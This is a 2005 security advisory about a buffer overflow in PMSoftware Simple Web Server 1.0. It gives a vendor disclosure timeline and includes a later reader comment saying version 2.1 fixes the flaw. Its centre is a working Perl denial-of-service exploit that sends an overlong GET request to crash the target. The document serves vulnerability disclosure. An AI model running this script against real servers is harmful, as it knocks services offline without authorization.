|
|
| |
"Simple Web Server the easy and small way to open an HTTP Web Server"
PMSoftware's Simple Web Server doesn't do proper bounds checking handling of normal GET requests. Sending an overlong page or script name, it causes an buffer overflow and an attacker can run arbitrary code on the victims machine. |
| |
Credit:
The information has been provided by ERNW Security.
|
| |
Vulnerable Systems:
* Simple Web Server version 1.0
The following request causes Simple Web Server to crash:
GET /AAAAAA.....AAAA with 260 A's
Exploit:
#!/usr/bin/perl
# DoS Exploit By mthumann@ernw.de
# Tested against WinXP + SP2
# Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
# buffer[250]
use Socket;
print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: swsexploit.pl <host>\n";
exit;}
$ip=$ARGV[0];
print "Sending Shellcode to: " . $ip . "\n\n";
my $testcode= "ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
"ABCDEFGHIJAAAA"; #EIP =41414141
my $attack="GET /".$testcode." HTTP/1.1\n" ;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S);
$|=1;
print $attack;
my @in=<S>;
select(STDOUT);
close(S);
} else { die("Can't connect...\n"); }
Disclosure Timeline:
17 Feb 2005: Vulnerability reported to vendor
28 Feb 2005: 2nd report because the vendor didn't respond
07 Mar 2005: 3rd mail sent to thre vendor - vendor didn't respond
18 Apr 2005: Public Disclosure
|
|
|
| Subject:
|
PMsoftware Simple Web Server V2.1 has fixed this bug. |
Date: |
11 Nov. 2007 |
| From: |
TurtleWax |
I checked the author's site and it has V2.1 released currently with this bug and some others fixed.
TurtleWax |
|
|
|
|
